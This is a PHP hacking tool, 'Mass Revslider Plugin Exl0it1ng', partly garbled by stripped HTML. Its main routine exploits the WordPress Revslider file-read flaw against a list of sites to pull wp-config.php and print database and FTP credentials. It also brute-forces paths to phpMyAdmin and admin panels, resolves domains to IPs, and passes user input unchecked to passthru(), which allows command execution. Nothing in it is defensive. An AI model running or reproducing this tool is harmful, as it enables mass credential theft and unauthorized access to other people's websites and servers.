# IP Scanner ~ Exploiter ~ Find DB Panel ~ Exploit Dorks ~ Domains 2 IP #

"; ///////////////////////////////// if ($_GET['dz'] == 'exp') { echo"


"; function findit($mytext,$starttag,$endtag) { $posLeft = stripos($mytext,$starttag)+strlen($starttag); $posRight = stripos($mytext,$endtag,$posLeft+1); return substr($mytext,$posLeft,$posRight-$posLeft); } error_reporting(0); set_time_limit(0); $ya=$_POST['go']; $co=$_POST['sites']; if($ya){ $e=explode("\r\n",$co); foreach($e as $bda){ //echo '
'.$bda; /// you can devlope the tool /// $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'; $dn=($bda).($linkof); $file=@file_get_contents($dn); if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){ echo"
Infected !
"; echo "
".$bda."
"; echo "DB name : ".findit($file,"DB_NAME', '","');")."
"; echo "DB user : ".findit($file,"DB_USER', '","');")."
"; echo "DB pass : ".findit($file,"DB_PASSWORD', '","');")."
"; echo "DB host : ".findit($file,"DB_HOST', '","');")."
"; } elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){ echo'
----------------------------------------------
'; echo"
Infected !
"; echo "
".$bda."
"; echo "FTP user : ".findit($file,"FTP_USER','","');")."
"; echo "FTP pass : ".findit($file,"FTP_PASS','","');")."
"; echo "FTP host : ".findit($file,"FTP_HOST','","');")."
"; } else{ echo'
----------------------------------------------
'; echo "
".$bda." ==> Not Infected !
";} echo'
----------------------------------------------
'; } } } ///////////////////////////////////// ///////////////////////////////////// if ($_GET['dz'] == 'dorks') { echo'
'; } ////////////////////////////////////// ////////////////////////////////////// if ($_GET['dz'] == 'toip') { echo"



"; if(isset($_POST['site2ip'])){ foreach(explode("\n",$_POST['site2ip']) as $site4ip){ $ipp=trim($site4ip); echo '
'.$ipp.' ==> '.gethostbyname ($ipp).'
'; } } } //////////////////////////////////// //////////////////////////////////// if ($_GET['dz'] == 'db') { echo' URL : '; if ($_POST['site']){ $site = $_POST['site']; passthru($site); } $list = array( '/phpMyAdmin/', '/phpmyadmin/', '/PMA/', '/pma/', '/admin/', '/dbadmin/', '/DB_ADMIN/', '/db_admin/', '/DBA/', '/SQLI/', '/dba/', '/sqli/', '/mysql/', '/myadmin/', '/phpmyadmin2/', '/phpMyAdmin2/', '/phpMyAdmin-2/', '/php-my-admin/', '/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/', '/phpMyAdmin-2.5.4/', '/phpMyAdmin-2.5.5-rc1/', '/phpMyAdmin-2.5.5-rc2/', '/phpMyAdmin-2.5.5/', '/phpMyAdmin-2.5.5-pl1/', '/phpMyAdmin-2.5.6-rc1/', '/phpMyAdmin-2.5.6-rc2/', '/phpMyAdmin-2.5.6/', '/phpMyAdmin-2.5.7/', '/phpMyAdmin-2.5.7-pl1/', '/phpMyAdmin-2.6.0-alpha/', '/phpMyAdmin-2.6.0-alpha2/', '/phpMyAdmin-2.6.0-beta1/', '/phpMyAdmin-2.6.0-beta2/', '/phpMyAdmin-2.6.0-rc1/', '/phpMyAdmin-2.6.0-rc2/', '/phpMyAdmin-2.6.0-rc3/', '/phpMyAdmin-2.6.0/', '/phpMyAdmin-2.6.0-pl1/', '/phpMyAdmin-2.6.0-pl2/', '/phpMyAdmin-2.6.0-pl3/', '/phpMyAdmin-2.6.1-rc1/', '/phpMyAdmin-2.6.1-rc2/', '/phpMyAdmin-2.6.1/', '/phpMyAdmin-2.6.1-pl1/', '/phpMyAdmin-2.6.1-pl2/', '/phpMyAdmin-2.6.1-pl3/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2-beta1/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2/', '/phpMyAdmin-2.6.2-pl1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-rc1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-pl1/', '/phpMyAdmin-2.6.4-rc1/', '/phpMyAdmin-2.6.4-pl1/', '/phpMyAdmin-2.6.4-pl2/', '/phpMyAdmin-2.6.4-pl3/', '/phpMyAdmin-2.6.4-pl4/', '/phpMyAdmin-2.6.4/', '/phpMyAdmin-2.7.0-beta1/', '/phpMyAdmin-2.7.0-rc1/', '/phpMyAdmin-2.7.0-pl1/', '/phpMyAdmin-2.7.0-pl2/', '/phpMyAdmin-2.7.0/', '/phpMyAdmin-2.8.0-beta1/', '/phpMyAdmin-2.8.0-rc1/', '/phpMyAdmin-2.8.0-rc2/', '/phpMyAdmin-2.8.0/', '/phpMyAdmin-2.8.0.1/', '/phpMyAdmin-2.8.0.2/', '/phpMyAdmin-2.8.0.3/', '/phpMyAdmin-2.8.0.4/', '/phpMyAdmin-2.8.1-rc1/', '/phpMyAdmin-2.8.1/', '/phpMyAdmin-2.8.2/', '/sqlmanager/', '/mysqlmanager/', '/p/m/a/', '/PMA2005/', '/pma2005/', '/dev/', '/phpmanager/', '/php-myadmin/', '/phpmy-admin/', '/webadmin/', '/sqlweb/', '/websql/', '/webdb/', '/mysqladmin/', '/mysql-admin/', '/mya/', '/PhpMyAdmin/', '/phpmyadmin/', '/myadmin/', '/mysql/', '/sql/', '/server/', '/db/', '/database/', '/databases/', '/adm/', '/configuration/', '/configure/', '/administrator/', '/login/', '/moderator/', '/controlpanel/', '/adminpanel/', '/admincontrol/', '/fileadmin/', '/data/', '/postgresql/', '/oracle/', '/msssql/', '/msaccess/', '/sysadmin/', '/serverdata/', '/webadmin/', '/admins/', '/Database_Administration/', '/WebAdmin/', '/useradmin/', '/sysadmins/', '/admin1/', '/system-administration/', '/administrators/', '/pgadmin/', '/directadmin/', '/staradmin/', '/ServerAdministrator/', '/SysAdmin/', '/administer/', '/LiveUser_Admin/', '/sys-admin/', '/typo3/', '/panel/', '/xlogin/', '/smblogin/', '/phpldapadmin/', '/server_admin/', '/database_administration/', '/system_administration/', '/ss_vms_admin_sm/', '/adminarea/', '/MySQL/', '/mysql_admin/', '/server_data/', '/DB/', '/DB1/', '/DB2/', '/DB3/', '/DB4/', '/DB5/', '/DB6/', '/DB7/', '/DB8/', '/DB9/', '/DB0/', '/db1/', '/db2/', '/db3/', '/db4/', '/db5/', '/db6/', '/db7/', '/db8/', '/db9/', '/db0/', '/mysql5/', '/mysql4/', '/root/', '/apache/', '/php/', '/Apache/', '/Php/', '/apach/', '/apachepanel/', '/WEBSERVERS/', '/DATABASE1/', '/DATABASE2/', '/DATABASE3/', '/DATABASE4/', '/DATABASE5/', '/DATABASE6/', '/DATABASE7/', '/DATABASE8/', '/DATABASE9/', '/WEBDATA/', '/WEB_DATA/', '/webservers/', '/database1/', '/database2/', '/database3/', '/database4/', '/database5/', '/database6/', '/database7/', '/database8/', '/database9/', '/webdata/', '/web_data/', ); if(isset($site)){ foreach($list as $path => $test) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_URL, $site.$test); $result = curl_exec($ch); curl_close($ch); //print $url; if (preg_match("/200 OK/", $result)){ echo "
[+] Found ==> [ $site$test ]"; } else if (preg_match("/401 Unauthorized/", $result)) { echo "
[!] Found ==> [ $site$test ][ $site$test ]
"; echo "
[-] Nothing found on [ $site$test ][$site$test]
"; } } echo "
Scan Finished !"; } } //////////////////////////////////// if ($_GET['dz'] == 'scan') { echo "
You can Devlope the Wp IP Scanner or start you idea here and send to dz-amir@hotmail.com ...."; } ?>
Mass Revslider Plugin Exl0it1ng v1 - By AMir dZ 52